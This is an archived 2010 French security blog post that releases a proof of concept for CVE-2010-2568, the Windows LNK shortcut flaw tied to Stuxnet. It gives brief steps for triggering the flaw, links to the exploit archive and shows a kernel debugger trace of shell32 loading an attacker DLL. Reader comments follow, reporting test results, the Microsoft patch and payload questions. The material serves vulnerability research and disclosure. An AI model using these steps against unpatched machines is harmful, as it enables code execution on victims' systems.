CVE-2010-2568 Lnk shorcut

juillet 18th, 2010 at 12:32 admin

Microsoft Security Advisory (2286198)

The Stuxnet Sting

Microsoft Windows automatically executes code specified in shortcut files

Vulnerability in Windows « LNK » files?

  1. Décompressez les fichiers dans ‘C:\’. Lancez un DbgView ou coller un KD à votre VM.
  2. Renommez ‘suckme.lnk_’ en ‘suckme.lnk’ et laissez la magie de shell32.dll faire le reste.
  3. Regardez vos logs.

http://ivanlef0u.fr/repo/suckme.rar

Testé sous XP SP3.

kd> g
Breakpoint 1 hit
eax=00000001 ebx=00f5ee7c ecx=0000c666 edx=00200003 esi=00000001 edi=7c80a6e4
eip=7ca78712 esp=00f5e9c4 ebp=00f5ec18 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
SHELL32!_LoadCPLModule+0x10d:
001b:7ca78712 ff15a0159d7c    call    dword ptr [SHELL32!_imp__LoadLibraryW (7c9d15a0)] ds:0023:7c9d15a0={kernel32!LoadLibraryW (7c80aeeb)}
kd> dd esp
00f5e9c4  00f5ee7c 000a27bc 00f5ee78 00000000
00f5e9d4  00000020 00000008 00f5ee7c 00000000
00f5e9e4  00000000 0000007b 00000000 00000000
00f5e9f4  00200073 002000e0 0000064c 0000028c
00f5ea04  1530000a 00000000 003a0043 0064005c
00f5ea14  006c006c 0064002e 006c006c 006d002e
00f5ea24  006e0061 00660069 00730065 00000074
00f5ea34  00090608 7c92005d 00000000 00000007
kd> db 00f5ee7c
00f5ee7c  43 00 3a 00 5c 00 64 00-6c 00 6c 00 2e 00 64 00  C.:.\.d.l.l...d.
00f5ee8c  6c 00 6c 00 00 00 92 7c-c8 f2 f5 00 00 17 72 02  l.l....|......r.
00f5ee9c  4b d2 00 00 d8 f2 f5 00-8b d2 a1 7c 00 00 00 00  K..........|....
00f5eeac  ac 80 9d 7c 30 d8 0d 00-34 d8 0d 00 b8 d7 0d 00  ...|0...4.......
00f5eebc  9a d2 a1 7c 30 d8 0d 00-c8 f2 f5 00 50 40 15 00  ...|0.......P@..
00f5eecc  50 40 15 00 00 00 00 00-b8 00 92 7c 40 b7 0c 00  P@.........|@...
00f5eedc  a8 ef f5 00 41 00 92 7c-18 07 09 00 5d 00 92 7c  ....A..|....]..|
00f5eeec  c8 f2 f5 00 00 ef f5 00-00 00 00 00 b8 00 92 7c  ...............|
kd> kv
ChildEBP RetAddr  Args to Child              
00f5ec18 7ca81a74 00f5ee7c 000a27bc 00f5f2c4 SHELL32!_LoadCPLModule+0x10d (FPO: [1,145,4])
00f5ee50 7ca82543 00f5ee74 000a27bc 000a27c0 SHELL32!CPL_LoadAndFindApplet+0x4a (FPO: [4,136,4])
00f5f294 7cb56065 000a25b4 000a27bc 000a27c0 SHELL32!CPL_FindCPLInfo+0x46 (FPO: [4,264,4])
00f5f2b8 7ca13714 00000082 00000000 00000104 SHELL32!CCtrlExtIconBase::_GetIconLocationW+0x7b (FPO: [5,0,0])
00f5f2d4 7ca1d306 000a25ac 00000082 00f5f570 SHELL32!CExtractIconBase::GetIconLocation+0x1f (FPO: [6,0,0])
00f5f410 7ca133b6 000dd7e0 00000082 00f5f570 SHELL32!CShellLink::GetIconLocation+0x69 (FPO: [6,68,4])
00f5f77c 7ca03c88 000dd7e0 00000000 0015aa00 SHELL32!_GetILIndexGivenPXIcon+0x9c (FPO: [5,208,4])
00f5f7a4 7ca06693 00131c60 000dd7e0 0015aa00 SHELL32!SHGetIconFromPIDL+0x90 (FPO: [5,0,4])
00f5fe20 7ca12db0 00131c64 0015aa00 00000000 SHELL32!CFSFolder::GetIconOf+0x24e (FPO: [4,405,4])
00f5fe40 7ca15e3c 00131c60 00131c64 0015aa00 SHELL32!SHGetIconFromPIDL+0x20 (FPO: [5,0,0])
00f5fe68 7ca03275 000f8090 0014d5b0 0014a910 SHELL32!CGetIconTask::RunInitRT+0x47 (FPO: [1,2,4])
00f5fe84 75f11b9a 000f8090 75f11b18 75f10000 SHELL32!CRunnableTask::Run+0x54 (FPO: [1,1,4])
00f5fee0 77f49598 00155658 000cb748 77f4957b BROWSEUI!CShellTaskScheduler_ThreadProc+0x111 (FPO: [1,17,0])
00f5fef8 7c937ac2 000cb748 7c98e440 0014cfe0 SHLWAPI!ExecuteWorkItem+0x1d (FPO: [1,0,4])
00f5ff40 7c937b03 77f4957b 000cb748 00000000 ntdll!RtlpWorkerCallout+0x70 (FPO: [Non-Fpo])
00f5ff60 7c937bc5 00000000 000cb748 0014cfe0 ntdll!RtlpExecuteWorkerRequest+0x1a (FPO: [3,0,0])
00f5ff74 7c937b9c 7c937ae9 00000000 000cb748 ntdll!RtlpApcCallout+0x11 (FPO: [4,0,0])
00f5ffb4 7c80b729 00000000 00edfce4 00edfce8 ntdll!RtlpWorkerThread+0x87 (FPO: [1,7,0])
00f5ffec 00000000 7c920250 00000000 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])

Entry Filed under: RE

42 Comments

  • 1. Milo Rambaldi  |  juillet 18th, 2010 at 15:00

    exactly,, what the logs looks like?
    give me an example of the log.


  • 2. admin  |  juillet 18th, 2010 at 15:03

    @Milo
    Check Dider Stevens’ post


  • 3. Milo Rambaldi  |  juillet 18th, 2010 at 15:07

    what is KD? konsole debug or what?


  • 4. admin  |  juillet 18th, 2010 at 15:09

    @Milo
    Yep, KD is your kernel debugger plugged to your VM like this.


  • 5. Faille de sécurité des &hellip  |  juillet 18th, 2010 at 15:56

    [...] nouvelles variantes de cette attaque ne manqueront pas de se propager dans les jours qui viennent (une preuve de concept a d’ailleurs été diffusée aujourd’hui par Ivanlef0u, qui permettra de faire des tests avec une version non [...]


  • 6. 5yn74x  |  juillet 18th, 2010 at 20:13

    Working on XP 64bit sp2 , with a 64bit dll :D


  • 7. ckahlo  |  juillet 19th, 2010 at 12:30

    Verified. Used own DLL and a MessageBox. Exploits our Win7-infrastructure perfectly.


  • 8. Interesante (y peligroso)&hellip  |  juillet 19th, 2010 at 23:38

    [...] Lnk shorcut http://www.ivanlef0u.tuxfamily.org/?p=411 Please link to a<a href="http://portalhispano.org/wordpress/archives/2851&quot; [...]


  • 9. Exploit demonstrates crit&hellip  |  juillet 19th, 2010 at 23:43

    [...] exploit for the unpatched vulnerability in the code for processing short-cuts (.lnk files) has been circulating since yesterday (Sunday). Source code for the exploit also appears to be in circulation. As soon as [...]


  • 10. blog.jorgemendez.com.ve &&hellip  |  juillet 20th, 2010 at 00:27

    [...] CVE-2010-2568 Lnk shorcut http://www.ivanlef0u.tuxfamily.org/?p=411 [...]


  • 11. Importante (2):Se hace pÃ&hellip  |  juillet 20th, 2010 at 06:44

    [...] CVE-2010-2568 Lnk shorcut http://www.ivanlef0…tuxfamily.org/?p=411 [...]


  • 12. phr33k  |  juillet 20th, 2010 at 11:19

    not working in w7 x64


  • 13. Es íncreible la capacida&hellip  |  juillet 20th, 2010 at 11:38

    [...] CVE-2010-2568 Lnk shorcut http://www.ivanlef0u.tuxfamily.org/?p=411 [...]


  • 14. Yakko  |  juillet 20th, 2010 at 13:45

    Nice work dude :)

    Fonctionne sous Win7 x32 et x64 :P


  • 15. Brian Gregory  |  juillet 20th, 2010 at 14:10

    Nothing happened. XP SP3 x86.


  • 16. shenzy  |  juillet 20th, 2010 at 17:04

    Nothing happened. Win7 x64, licenced and Up to date.


  • 17. testing  |  juillet 20th, 2010 at 19:07

    works on 2k SP4, XP PRO SP3, W7 X86

    nothing works on W7 X64

    (tested by me)

    but, n1 work!


  • 18. Marcosof Informatica y Te&hellip  |  juillet 20th, 2010 at 21:18

    [...] CVE-2010-2568 Lnk shorcut http://www.ivanlef0u.tuxfamily.org/?p=411 [...]


  • 19. Si aún eres Windowsdepen&hellip  |  juillet 21st, 2010 at 04:26

    [...] los accesos directos (archivos con extensión lnk) por lo que manipulando un acceso directo de una manera especifica se puede lograr ejecutar código en la PC victima sin intervención del usuario y sin que éste se [...]


  • 20. Rajesh Nikam  |  juillet 21st, 2010 at 06:06

    Analysis of CVE-2010-2568: LNK file automatically executes code in Control Panel shortcuts


  • 21. Microsoft LNK Vulnerabili&hellip  |  juillet 21st, 2010 at 11:00

    [...] few days ago, an exploit used for highly targeted attacks was published here: CVE-2010-2568 Lnk shortcut. As the blog post, and other posts, state, this is caused by Windows Control Panel's [...]


  • 22. Se hace público el explo&hellip  |  juillet 22nd, 2010 at 00:57

    [...] de que se hayan tomado todas las medidas oportunas conocidas hasta el momento para impedirlo. El fallo se aprovecha a través de archivos LNK (accesos directos) y supone un duro varapalo para Microsoft, pues los atacantes han conseguido [...]


  • 23. Análisis vulnerabilidad &hellip  |  juillet 22nd, 2010 at 04:59

    [...] análisis y la exitosa reproducción de la vulnerabilidad se la debemos a ivanlef0u, quien en su publicación adjuntó los archivos necesarios para llevarla a cabo. Lo primero que hicimos al descargar los [...]


  • 24. Marcosof Informatica y Te&hellip  |  juillet 23rd, 2010 at 15:41

    [...] pm Esta entrada detalla cómo aplicar una directiva de restricción de software para evitar la última vulnerabilidad crítica de Windows en todas sus versiones y para la que aún no hay parche. Es una libre [...]


  • 25. Marcosof Informatica y Te&hellip  |  juillet 23rd, 2010 at 15:48

    [...] de que se hayan tomado todas las medidas oportunas conocidas hasta el momento para impedirlo. El fallo se aprovecha a través de archivos LNK (accesos directos) y supone un duro varapalo para Microsoft, pues los atacantes han conseguido [...]


  • 26. Basement Dad  |  juillet 23rd, 2010 at 16:58

    Nais work. Although I thought the code gets executed only by opening the explorer@C:\. I tried it in a VM and it starts after executing the lnk or rightclick -> properties …


  • 27. LNK Zero-Day Exploit: Sie&hellip  |  juillet 26th, 2010 at 06:22

    [...] the meantime, a security researcher known as Ivanlef0u has posted a proof-of-concept of the exploit (site is in French), while Win32/TrojanDownloader.Chymine.A and Win32/Autorun.VB.RP are in the wild [...]


  • 28. Maria  |  juillet 27th, 2010 at 17:51

    Hey great post,

    I’m new to windbg hence one question how to break on kernel32!LoadLibraryW ? I’m using VMware and type bu kernel32!LoadLibraryW command inside host OS then I trigger this exploit but nothings happening:( windbg does not break.


  • 29. Microsoft LNK Vulnerabili&hellip  |  juillet 29th, 2010 at 22:29

    [...] few days ago, an exploit used for highly targeted attacks was published here: CVE-2010-2568 Lnk shortcut. As the blog post, and other posts, state, this is caused by Windows Control Panel's [...]


  • 30. TaPiOn  |  août 2nd, 2010 at 13:17

    c’est toi le MOTH4FUCKA #@! ^^


  • 31. ZZ1  |  août 2nd, 2010 at 23:36

    found this one back in a 2001. The original idea was :what happens when two LNK’s point at each other. Made some research and wrote an my one exploit in back in 2006.
    I went even further in a LNK analisis of my own from what is uncovered to date.
    There is a flaw in how shortcuts handle short-keys related to them. (tested in winxp sp2)


  • 32. Por qué debo actualizar &hellip  |  août 3rd, 2010 at 05:12

    [...] la vulnerabilidad esperando por una solución. Sin embargo, el 18 de julio la vulnerabilidad fue publicada en Internet. Lo anterior provocó que el SANS cambiara su indicador de amenaza de verde a amarillo [...]


  • 33. Mr.Hien  |  août 3rd, 2010 at 09:24

    Microsoft released a patch for this vuln:
    http://www.microsoft.com/technet/security/bulletin/ms10-046.mspx


  • 34. Rudi  |  août 5th, 2010 at 17:26

    Hi.

    Has someone a guideline, how to create a simple « YouAreVulnerableMsgBox.DLL » that would be runned by the LNK file included in this proof of concept exploit?

    Regards, Rudi.


  • 35. snow  |  août 11th, 2010 at 15:20

    I found something like that:

    http://nemesis.te-home.net/News/20100723_Patch_for_0day__LNK_file_handling_vulnerability_up.html

    Any comments? :>


  • 36. Can you say bad path? &la&hellip  |  août 14th, 2010 at 01:31

    [...] you say bad path? By windowssucks There has been a lot of talk about the recent .LNK exploit so naturally I had to play with some shortcuts in a hex editor. Turns out that explorer seems to [...]


  • 37. nerd  |  septembre 30th, 2010 at 21:02

    Hi,
    Tried on unpatched Win7 x86 & x64 – doesn’t work for me :(

    How does this work? Where are the source for that?


  • 38. nerd  |  septembre 30th, 2010 at 21:05

    Sorry, have already patch – try now uninstall the patch and run your stuff


  • 39. nerd  |  septembre 30th, 2010 at 21:16

    Uninstalled Patch 228xxx – doesn’t work. My question: Is in this LNK file an code – if yes, from where on (Position) should I use IDA’s C command

    Thanks


  • 40. Vulnerabilidad en sistema&hellip  |  août 3rd, 2011 at 11:12

    [...] Proof of concept: http://www.ivanlef0u.tuxfamily.org/?p=411 [...]


  • 41. Hack all the world - CVE-&hellip  |  octobre 22nd, 2011 at 08:29

    [...] http://www.ivanlef0u.tuxfamily.org/?p=411 This entry was posted in Exploit and Tagged: Exploit . Bookmark the permalink. [...]


  • 42. Solución a la vulner&hellip  |  avril 13th, 2012 at 16:23

    [...] entrada detalla cómo aplicar una directiva de restricción de software para evitar la última vulnerabilidad crítica de Windows en todas sus versiones y para la que aún no hay parche. Es una [...]


Trackback this post


Calendar

mars 2024
L Ma Me J V S D
« fév    
 123
45678910
11121314151617
18192021222324
25262728293031

Most Recent Posts